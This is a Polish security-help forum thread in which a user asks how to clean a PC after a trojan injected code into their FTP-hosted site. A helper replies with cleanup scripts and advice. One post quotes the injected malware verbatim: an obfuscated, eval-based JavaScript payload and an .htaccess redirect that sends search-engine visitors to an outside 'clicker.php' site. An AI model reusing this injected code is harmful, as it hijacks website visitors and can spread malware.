menar Opublikowano 9 Stycznia 2013 Zgłoś Udostępnij Opublikowano 9 Stycznia 2013 WItam mam zainfekowany komputer trojanem jakims ktory wbija sie na serwery FTP zmieniajac kod plikow i blokujac strony avast wykrywa js:iframe-xj[trj] Prosze o pomoc bo nie daje rady juz z tym... OTL.Txt Extras.Txt Odnośnik do komentarza
picasso Opublikowano 9 Stycznia 2013 Zgłoś Udostępnij Opublikowano 9 Stycznia 2013 zainfekowany komputer trojanem jakims ktory wbija sie na serwery FTP zmieniajac kod plikow i blokujac strony avast wykrywa js:iframe-xj[trj] W raporcie nie ma oznak czynnej infekcji, jest tylko odpadek po "policji" + adware, ale to nie ma związku. Skąd pewność, że to ten komputer jest źródłem? Skąd pewność że wina nie leży po stronie serwerowej (luki w oprogramowaniu)? Jakie oprogramowanie jest zainstalowane na serwerze? Czy po pierwszej infekcji zmieniałeś wszystkie hasła FTP? Na teraz: 1. Od razu skoryguj sprawę z oprogramowaniem zabezpieczającym, bo jest tu katastrofa. Działają wspólnie Avast + ESET Smart Security. Jeden z nich do deinstalacji. Od razu pozbądź się też mało skutecznego Spybota oraz adware AVG Security Toolbar. 2. Uruchom OTL i w sekcji Własne opcje skanowania / skrypt wklej: :OTL IE - HKLM\..\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}: "URL" = "http://feed.helperbar.com/?publisher=OPENCANDY&dpid=OPENCANDYAPRIL&co=PL&userid=423e462a-6da8-46bc-90b1-a69156bf68f7&affid=110774&searchtype=ds&babsrc=lnkry&q={searchTerms}" IE - HKU\S-1-5-21-3325182840-2650996301-1092758413-1000\..\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}: "URL" = "http://feed.helperbar.com/?publisher=OPENCANDY&dpid=OPENCANDYAPRIL&co=PL&userid=423e462a-6da8-46bc-90b1-a69156bf68f7&affid=110774&searchtype=ds&babsrc=lnkry&q={searchTerms}" IE - HKU\S-1-5-21-3325182840-2650996301-1092758413-1000\..\SearchScopes\{0388404D-6072-4CEB-B521-8F090FEAEE57}: "URL" = "http://klit.startnow.com/s/?q={searchTerms}&src=defsearch&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=741&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.4.0&install_country=PL&install_date=20120209&user_guid=C420D2DB3DB44AD09EBEF4341913CFD5&machine_id=4cd5afaf5eb4e21c9043edc37f6611d7&browser=IE&os=win&os_version=6.1-x64-SP1&iesrc={referrer:source}" IE - HKU\S-1-5-21-3325182840-2650996301-1092758413-1000\..\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}: "URL" = "https://isearch.avg.com/search?cid={6876415B-4691-45BD-9C85-1133EA3B184C}&mid=8f37b150372f47d09183d1569643f354-07f3780bbd7966a981fa68fa32d4b562adedc4e6&lang=pl&ds=xn011&pr=sa&d=2012-09-18 00:11:54&v=12.2.5.34&sap=dsp&q={searchTerms}" O2:64bit: - BHO: (TinyBHO Class) - {00e71626-0bef-11dc-8314-0864264c9a64} - C:\Users\Michał\AppData\Roaming\DownloaderGold\ieplug.dll () O2 - BHO: (TinyBHO Class) - {00e71626-0bef-11dc-8314-0800200c9a66} - C:\Users\Michał\AppData\Roaming\DownloaderGold\ieplug.dll () :Reg [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Search Bar"=- "Search Page"=- "Start Page"="about:blank" [-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search] :Files C:\ProgramData\dsgsdgdsgdsgw.pad C:\ProgramData\dsgsdgdsgdsgw.js C:\Users\Michał\AppData\Roaming\DownloaderGold C:\Users\Michał\AppData\Roaming\OpenCandy netsh advfirewall reset /C :Commands [emptytemp] Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Klik w Wykonaj skrypt. Zatwierź restart systemu. 3. Uruchom AdwCleaner i zastosuj Usuń. Na dysku C powstanie log z usuwania. 4. Zrób nowy log OTL z opcji Skanuj (już bez Extras). Dołącz log utworzony przez AdwCleaner. . Odnośnik do komentarza
menar Opublikowano 9 Stycznia 2013 Autor Zgłoś Udostępnij Opublikowano 9 Stycznia 2013 Problem o ktorym pisze to js:iframe-xj[trj] do serwera FTP dostał sie trojan z mojego komputera, dodaje on do plikow index. httecss oraz .js rozne kody np. /*336988*/ try{window.document.body++}catch(gdsgsdg){dbshre=152;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,98,93,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,94,94,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,92,105,106,103,101,90,110,109,96,112,39,99,111,38,91,101,99,94,98,93,107,40,107,95,104,32,53,8,1,24,25,26,27,94,94,39,109,111,112,100,94,40,107,102,107,98,110,100,102,102,25,55,27,30,89,91,109,106,99,109,109,95,34,50,5,3,26,27,23,24,96,96,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,94,94,39,109,111,112,100,94,40,99,92,97,96,98,111,23,53,25,33,44,103,112,32,53,8,1,24,25,26,27,94,94,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,98,93,38,108,110,116,99,93,39,102,96,93,108,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,96,96,41,106,108,114,102,96,37,108,104,106,27,52,24,32,43,107,111,31,52,7,5,4,2,25,26,27,23,97,95,26,35,24,92,10 4,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,95,95,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,98,93,84,32,56,55,38,92,98,112,57,30,33,52,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,96,95,111,60,100,94,103,96,101,108,59,115,68,91,32,32,97,97,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,94,94,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s="";for(i=0;i-458!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} /*/336988*/ albo #336988# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|p ocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://coopmatrix.it/clicker.php [R=301,L] </IfModule> #/336988# strony przestają działać zmieniłem juz hasło na ftp, i dalem chmode na pliki 444 z tego co wyczytałem to wirus ktory wyciaga hasal z np. Total Commander i sam sobie wchodzi i to robi, no ale gdzies on na tym komputerze musi być ulokowany jakoś trzeba go wywalić? zobaczymy czy to wroci OTL.Txt AdwCleanerS2.txt Odnośnik do komentarza
picasso Opublikowano 9 Stycznia 2013 Zgłoś Udostępnij Opublikowano 9 Stycznia 2013 (edytowane) Jak mówię ja w Twoim raporcie nie widzę takiej infekcji, a skanerów też użyłeś sporo. Czyż nie należy założyć, że system tu oglądany jest jednak czysty? Pytam: skąd wiadomo, że Twój komputer jest źródłem infekcji stron? Ten rodzaj infekcji może mieć równie dobrze źródło po stronie serwerowej. Nie odpowiedziałeś mi na pytanie: jakie oprogramowanie jest zainstalowane na serwerze, w jakiej wersji, w jakim stopniu załatania. Co do reszty, to zadania wykonane i tylko drobne poprawki: 1. Korekta domyślnych wyszukiwarek IE po użyciu AdwCleaner. Otwórz Notatnik i wklej w nim: Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes] "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes] "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes] "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" [-HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes] [-HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes] [-HKEY_USERS\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes] [-HKEY_USERS\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes] [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] "ROC_ROC_NT"=- Z menu Notatnika > Plik > Zapisz jako > Ustaw rozszerzenie na Wszystkie pliki > Zapisz jako FIX.REG Kliknij prawym na plik i z menu wybierz opcję Scal. Potwierdź import do rejestru. 2. Porządki po narzędziach: w AdwCleaner uruchom Odinstaluj, w OTL uruchom Sprzątanie, przez SHIFT+DEL dokasuj poniższe foldery. C:\ProgramData\Spybot - Search & Destroy C:\Program Files (x86)\Spybot - Search & Destroy 2 C:\Users\Michał\AppData\Roaming\ESET 3. Napraw błąd WMI zgłaszany w Dzienniku zdarzeń: KB2545227. 4. Wyczyść foldery Przywracania systemu: KLIK. 5. Odinstaluj stare Adobe i Java, zaktualizuj Operę i produkty Mozilla, sprawdź wersję Google Chrome: KLIK. Wg raportu obecnie posiadasz wersje: ========== HKEY_LOCAL_MACHINE Uninstall List ========== 64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]"{26A24AE4-039D-4CA4-87B4-2F86417005FF}" = Java 7 Update 5 (64-bit) [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]"{26A24AE4-039D-4CA4-87B4-2F83216031FF}" = Java 6 Update 31"{26A24AE4-039D-4CA4-87B4-2F83217009FF}" = Java 7 Update 9"{AC76BA86-7AD7-1045-7B44-A95000000001}" = Adobe Reader 9.5.0 - Polish"Google Chrome" = Google Chrome"Mozilla Firefox 17.0.1 (x86 pl)" = Mozilla Firefox 17.0.1 (x86 pl)"Mozilla Thunderbird 17.0.2 (x86 pl)" = Mozilla Thunderbird 17.0.2 (x86 pl)"Opera 11.61.1250" = Opera 11.61 . Edytowane 18 Lutego 2013 przez picasso 18.02.2013 - Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso Odnośnik do komentarza
Rekomendowane odpowiedzi